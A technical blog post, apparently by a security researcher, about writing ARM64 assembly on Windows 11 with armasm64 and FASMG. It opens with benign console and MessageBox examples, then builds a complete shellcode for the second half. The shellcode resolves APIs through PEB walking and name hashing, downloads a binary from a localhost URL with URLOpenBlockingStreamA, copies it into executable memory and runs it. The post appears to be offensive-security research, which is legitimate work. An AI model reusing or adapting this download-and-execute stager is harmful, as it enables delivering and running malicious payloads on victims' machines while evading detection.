Back in October 2018, I wanted to write ARM assembly on Windows. All I could acquire then was a Surface tablet running Windows RT that was released sometime in October 2012. Windows RT (now deprecated) was a version of Windows 8 designed to run on the 32-Bit ARMv7 architecture. By the summer of 2013, it was considered to be a commercial flop.
For developers, it was possible to compile binaries on a separate machine and get them running on the tablet via USB stick or network, but unless you wanted to obtain a developer license, a jailbreak exploit was required. Since there were too many limitations, my attention shifted towards Linux on a Raspberry Pi4.
From what I read, the release of Windows 10 for ARMv7 in 2015 was a distinct improvement over Windows RT. Limitations for developers persisted but at least Microsoft provided support for emulating x86 applications. Today, I finally have an ARM64 device running Windows 11 without all the problems that plagued previous versions. There’s full native support for developers with Visual Studio 2022 and a Linux subsystem that can run Ubuntu or Debian if you want to program ARM64 applications for Linux. (I know WSL isn’t new, but still). Best of all perhaps is the ability to emulate both 32-bit and 64-bit applications for the x86 architecture.
To support Windows on ARM, you have at least three options:
MSVC and LLVM-MinGW are best for C/C++. And I prefer the GNU Assembler (as) over the ARM Macro Assembler (armasm64) shipped by Microsoft, but the main problem with both is the lack of support for macros. armasm64 supports most of the directives documented by ARM, but appears to have limitations. From what I can tell, ARMASM has no support for structures making it very difficult to write programs in assembly. This is also a problem with the GNU Assembler and the only way around it is to use symbolic names with the hardcoded offset of each field.
There is some hope. Despite having no direct support for the ARM architecture, flat assembler g (FASMG) by Tomasz Grysztar is an adaptable assembly engine that “has the ability to become an assembler for any CPU architecture.”. There are include files for fasmg which implement ARM64 instructions using macros and it’s what I decided to use for a simple PoC in this post.
Once you setup FASMG, copy the AARCH64 macros from asmFish to the include directory. My own batch file that I execute from a command prompt inside the root directory of fasm looks like this:
@echo off set include=C:\fasmw\fasmg\packages\utility;C:\fasmw\fasmg\packages\x86\include set path=%PATH%;C:\fasmw\fasmg\core
Thomas has also provided an ARM64 example to get started.
Windows uses the same as what’s used on Linux for subroutines. However, invocation of system calls are different: Linux uses x8 to hold system call ID whereas Windows embeds the ID in the SVC instruction.
Register | Volatile? | Role |
---|---|---|
x0 | Yes | Parameter/scratch register 1, result register |
x1-x7 | Yes | Parameter/scratch register 2-8 |
x8-x15 | Yes | Scratch registers. Used as parameter too. |
x16-x17 | Yes | Intra-procedure-call scratch registers |
x18 | No | Platform register: in kernel mode, points to KPCR for the current processor; in user mode, points to TEB |
x19-x28 | No |
Scratch register |
x29/fp | No | Frame pointer |
x30/lr | No | Link register |
x31/zxr | No | Zero register |
Initially, I started working with ARMASM, so the following is just an example of how to create a simple console application.
; armasm64 hello.asm -ohello.obj ; cl hello.obj /link /subsystem:console /entry:start kernel32.lib AREA .drectve, DRECTVE ; invoke API without repeating the same instructions ; p1 should be the number of register available to load address of API MACRO INVOKE $p1, $p2 ; name of macro followed by number of parameters adrp $p1, __imp_$p2 ldr $p1, [$p1, __imp_$p2] blr $p1 MEND ; saves time typing "__imp_" for each API imported MACRO IMPORT_API $p1 IMPORT __imp_$p1 MEND AREA data, DATA Text DCB "Hello, World!\n" ; symbolic constants for clarity NULL equ 0 STD_OUTPUT_HANDLE equ -11 ; the entrypoint EXPORT start ; the API used IMPORT_API ExitProcess IMPORT_API WriteFile IMPORT_API GetStdHandle ; start of code to execute AREA text, CODE start PROC mov x0, STD_OUTPUT_HANDLE INVOKE x1, GetStdHandle mov x4, NULL mov x3, NULL mov x2, 14 ; string length... adr x1,Text INVOKE x5, WriteFile mov x0, NULL INVOKE x1, ExitProcess ENDP END
And a simple GUI. A version for FASMG can be found here.
; armasm64 msgbox.asm -omsgbox.obj ; cl msgbox.obj /link /subsystem:windows /entry:start kernel32.lib user32.lib AREA .drectve, DRECTVE ; invoke API without repeating the same instructions ; p1 should be the free register available to load address of API MACRO INVOKE $p1, $p2 adrp $p1, __imp_$p2 ldr $p1, [$p1, __imp_$p2] blr $p1 MEND ; saves time typing "__imp_" for each API imported MACRO IMPORT_API $p1 IMPORT __imp_$p1 MEND AREA data, DATA Text DCB "Hello, World!", 0x0 Caption DCB "Hello from ARM64", 0x0 ; symbolic names for clarity NULL equ 0 ; the entrypoint EXPORT start ; the API used IMPORT_API ExitProcess IMPORT_API MessageBoxA ; start of code to execute AREA text, CODE start PROC mov x3,NULL adr x2,Caption adr x1,Text mov x0,NULL INVOKE x4, MessageBoxA mov x0, NULL INVOKE x1, ExitProcess ENDP END
; The following are 64-Bit offsets. TEB_ProcessEnvironmentBlock = 0x00000060 TEB_LastErrorValue = 0x00000068 PEB_Ldr = 0x00000018 PEB_LDR_DATA_InLoadOrderModuleList = 0x00000010 LDR_DATA_TABLE_ENTRY_DllBase = 0x00000030 IMAGE_DOS_HEADER_e_lfanew = 0x0000003C IMAGE_EXPORT_DIRECTORY_Characteristics = 0x00000000 IMAGE_EXPORT_DIRECTORY_TimeDateStamp = 0x0004 IMAGE_EXPORT_DIRECTORY_MajorVersion = 0x0008 IMAGE_EXPORT_DIRECTORY_MinorVersion = 0x000A IMAGE_EXPORT_DIRECTORY_Name = 0x0000000C IMAGE_EXPORT_DIRECTORY_Base = 0x00000010 IMAGE_EXPORT_DIRECTORY_NumberOfFunctions = 0x00000014 IMAGE_EXPORT_DIRECTORY_NumberOfNames = 0x00000018 IMAGE_EXPORT_DIRECTORY_AddressOfFunctions = 0x0000001C IMAGE_EXPORT_DIRECTORY_AddressOfNames = 0x00000020 IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals = 0x00000024 STATFLAG_DEFAULT = 0 STATFLAG_NONAME = 1 STATFLAG_NOOPEN = 2 STREAM_SEEK_SET = 0 STREAM_SEEK_CUR = 1 STREAM_SEEK_END = 2
FASMG provides macros to support struct and union that are supported by Borland’s Turbo or Microsoft’s Macro Assembler.
struct LARGE_INTEGER LowPart dd ? HighPart dd ? ends struct ULARGE_INTEGER LowPart dd ? HighPart dd ? ends struct GUID Data1 dd ? Data2 dw ? Data3 dw ? Data4 db 8 dup(?) ends struct STATSTG pwcsName dq ? ; LPOLESTR _type dd ? ; DWORD _padding dd ? ; padding for _type cbSize ULARGE_INTEGER mtime FILETIME ctime FILETIME atime FILETIME grfMode dd ? grfLocksSupported dd ? clsid GUID grfStateBits dd ? reserved dd ? ends
The shellcode uses the IStream object to read data from the HTTP request. FASMG provides macros to declare an interface. There’s also comcall and cominvk macros to invoke interface methods. I decided not to use them here. As pointed out before in relation to executing .NET assemblies, interfaces are just structures with function pointers.
struct IStreamVtbl ; IUnknown QueryInterface dq ? AddRef dq ? Release dq ? ; ISequentialStream Read dq ? Write dq ? ; IStream Seek dq ? SetSize dq ? CopyTo dq ? Commit dq ? Revert dq ? LockRegion dq ? UnlockRegion dq ? Stat dq ? Clone dq ? ends struct IStream lpVtbl dq ? ; pointer to IStreamVtbl ends
FASMG doesn’t support these out of the box. But what you can do is define a structure with your variables in it.
struct var_tbl pStream IStream Stg STATSTG liZero LARGE_INTEGER BytesRead dq ? pCode dq ? ends
At the entry of program or subroutine, subtract the size of the structure (aligned by 16) from the stack pointer.
sub sp, sp, ((sizeof.var_tbl + 15) and -16)
Then when you need to address a variable, offsets can be accessed with the ADD instruction.
; x2 = &var_tbl.pStream add x2, sp, var_tbl.pStream
To access the value store in var_tbl.pStream
; x2 = var_tbl.pStream ldr x2, [sp, var_tbl.pStream]
The most powerful feature of FASMG is its support for macros. It’s possible to implement cryptographic hashes like SHA256, SHA512 and SHA3 purely with macros. The following doesn’t demonstrate the full potential of FASMG at all.
macro hash_api dll_name, api_name local dll_hash, api_hash, b ; DLL virtual at 0 db dll_name dll_hash = 0 repeat $ load b byte from % - 1 dll_hash = (dll_hash + b) and 0xFFFFFFFF dll_hash = ((dll_hash shr 8) and 0xFFFFFFFF) or ((dll_hash shl 24) and 0xFFFFFFFF) end repeat end virtual ; API virtual at 0 db api_name api_hash = 0 repeat $ load b byte from % - 1 api_hash = (api_hash + b) and 0xFFFFFFFF api_hash = ((api_hash shr 8) and 0xFFFFFFFF) or ((api_hash shl 24) and 0xFFFFFFFF) end repeat end virtual dd (dll_hash + api_hash) and 0xFFFFFFFF end macro
xpr is an alias for the x18 register. As noted in the table of integer registers, it contains a pointer to the TEB for user-mode applications. Every offset used by AMD64 can probably be used for ARM64. However, it would be safer check debugging symbols.
For x86, the syscall number is placed in the accumulator (EAX/RAX) but for ARM64, it’s embedded in the SVC opcode itself and there appears to be no alternative. (at least not that I’m aware of). To build a new stub would require using NtAllocateVirtualMemory and manually encoding the instruction.
The following code uses URLOpenBlockingStream to download a shellcode and execute in memory.
start: ;brk #0xF000 sub sp, sp, ((sizeof.var_tbl + 15) and -16) adr x20, hash_tbl adr x21, invoke_api ; LoadLibraryA("urlmon.dll") adr x0, urlmon_name blr x21 cbz x0, exit_shellcode ; hr = URLOpenBlockingStreamA(NULL, szUrl, &pStream, 0, 0); mov x4, xzr mov x3, xzr add x2, sp, var_tbl.pStream adr x1, url_path mov x0, xzr ; NULL blr x21 cbnz x0, exit_shellcode ; STATSTG Stg; ; hr = pStream->Stat(&Stg, STATFLAG_NONAME); mov x2, STATFLAG_NONAME add x1, sp, var_tbl.Stg ldr x0, [sp, var_tbl.pStream] ldr x3, [x0, IStream.lpVtbl] ldr x3, [x3, IStreamVtbl.Stat] blr x3 cbnz x0, exit_shellcode ; LARGE_INTEGER liZero = { 0 }; ; hr = pStream->Seek(liZero, STREAM_SEEK_SET, NULL); mov x3, xzr ; NULL mov x2, xzr ; STREAM_SEEK_SET add x1, sp, var_tbl.liZero str xzr, [x1] mov x1, xzr ldr x0, [sp, var_tbl.pStream] ldr x4, [x0, IStream.lpVtbl] ldr x4, [x4, IStreamVtbl.Seek] blr x4 cbnz x0, exit_shellcode ; pCode = VirtualAlloc(NULL, Stg.cbSize.LowPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE); mov x3, PAGE_EXECUTE_READWRITE mov x2, MEM_COMMIT ldr w1, [sp, var_tbl.Stg.cbSize.LowPart] mov x0, NULL blr x21 cbz x0, exit_shellcode str x0, [sp, var_tbl.pCode] ; hr = pStream->Read(pCode, Stg.cbSize.LowPart, &BytesRead); add x3, sp, var_tbl.BytesRead ldr w2, [sp, var_tbl.Stg.cbSize.LowPart] ldr x1, [sp, var_tbl.pCode] ldr x0, [sp, var_tbl.pStream] ldr x4, [x0, IStream.lpVtbl] ldr x4, [x4, IStreamVtbl.Read] blr x4 cbnz x0, exit_shellcode ldr x0, [sp, var_tbl.pCode] blr x0 blr x21 cbz x0, exit_shellcode exit_shellcode: add sp, sp, ((sizeof.var_tbl + 15) and -16) ret invoke_api: ; save parameters, except for x0, which won't be used. stp x1, x2, [sp, -64]! stp x3, x4, [sp, 16] stp x5, x6, [sp, 32] stp x7, x8, [sp, 48] ; Ldr = (PPEB_LDR_DATA)NtCurrentTeb()->ProcessEnvironmentBlock->Ldr; mov x1, x18 ; xpr ldr x2, [x1, TEB_ProcessEnvironmentBlock] ldr x2, [x2, PEB_Ldr] ; end = (PLIST_ENTRY)&Ldr->InLoadOrderModuleList; add x2, x2, PEB_LDR_DATA_InLoadOrderModuleList ; nxt = end->Flink; ldr x3, [x2] ; read first entry nxt_dll: cmp x3, x2 ; while (nxt != end) bne load_dll_loop add sp, sp, 64 ; fixup stack ;ret ; return to caller load_dll_loop: ; bx = e->DllBase ldr x4, [x3, LDR_DATA_TABLE_ENTRY_DllBase] ldr x3, [x3] ; nxt = nxt->Flink ; nt = VA(PIMAGE_NT_HEADERS, bx, ((PIMAGE_DOS_HEADER)e->DllBase)->e_lfanew); ldr w5, [x4, IMAGE_DOS_HEADER_e_lfanew] add x5, x4, w5, uxtw #0 ; va = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; ; if (!va) continue; ldr w5, [x5, #0x88] cbz w5, nxt_dll ; exp = VA(PIMAGE_EXPORT_DIRECTORY, bx, va); add x5, x4, w5, uxtw #0 ; cnt = exp->NumberOfNames; ; if (!cnt) continue; ldr w6, [x5, IMAGE_EXPORT_DIRECTORY_NumberOfNames] cbz w6, nxt_dll ; dll = VA(PCHAR, bx, exp->Name); ldr w7, [x5, IMAGE_EXPORT_DIRECTORY_Name] add x7, x4, w7, uxtw #0 mov w8, #0 ; dx = 0 hash_dll: ; while (*dll) c = *dll++, ; c = (c >= 'A' && c <= 'Z') ? (c | 32) : c, dx += c, dx = R(dx, 8); ldrsb x9, [x7], 1 cbz x9, exit_hash_dll sub x10, x9, 'A' orr x11, x9, 32 cmp x10, 26 csel x9, x11, x9, cc add w8, w8, w9 ror w8, w8, 8 b hash_dll exit_hash_dll: ; aon = VA(PDWORD, bx, exp->AddressOfNames); ldr w9, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNames] add x9, x4, w9, uxtw #0 mov x10, #0 nxt_api: mov x11, #0 ; api = VA(PCHAR, bx, aon[i]); ldr w12, [x9, w10, uxtw #2] add x12, x4, w12, uxtw #0 hash_api_loop: ; while (*api) ax += *api++, ax = R(ax, 8); ldrsb x13, [x12], 1 cbz x13, exit_hash_api add w11, w11, w13 ror w11, w11, 8 b hash_api_loop exit_hash_api: add w11, w11, w8 ; ldr w12, [x20] ; load hash cmp w11, w12 ; if ((ax + dx) == hx) beq load_api add w10, w10, 1 ; i++ cmp w10, w6 ; i < cnt bne nxt_api b nxt_dll load_api: add x20, x20, 4 ; aof = VA(PDWORD, bx, exp->AddressOfFunctions); ldr w1, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfFunctions] add x1, x4, x1 ; ono = VA(PDWORD, bx, exp->AddressOfNameOrdinals); ldr w2, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals] add x2, x4, x2 ; pfn = VA(PVOID, bx, aof[ono[i]]); ldrh w2, [x2, w10, uxtw #1] ; read ordinal ldr w1, [x1, x2, lsl #2] ; read address of function rva add x9, x4, w1, uxtw #0 ; add base ; load parameters saved on stack ldp x1, x2, [sp], 16 ldp x3, x4, [sp], 16 ldp x5, x6, [sp], 16 ldp x7, x8, [sp], 16 ; execute API and return to original caller. br x9 hash_tbl: hash_api "kernelbase.dll", "LoadLibraryA" hash_api "urlmon.dll", "URLOpenBlockingStreamA" hash_api "kernelbase.dll", "VirtualAlloc" hash_api "kernelbase.dll", "ExitThread" urlmon_name: db "urlmon", 0 url_path: db "http://localhost:1234/notepad.arm64.bin", 0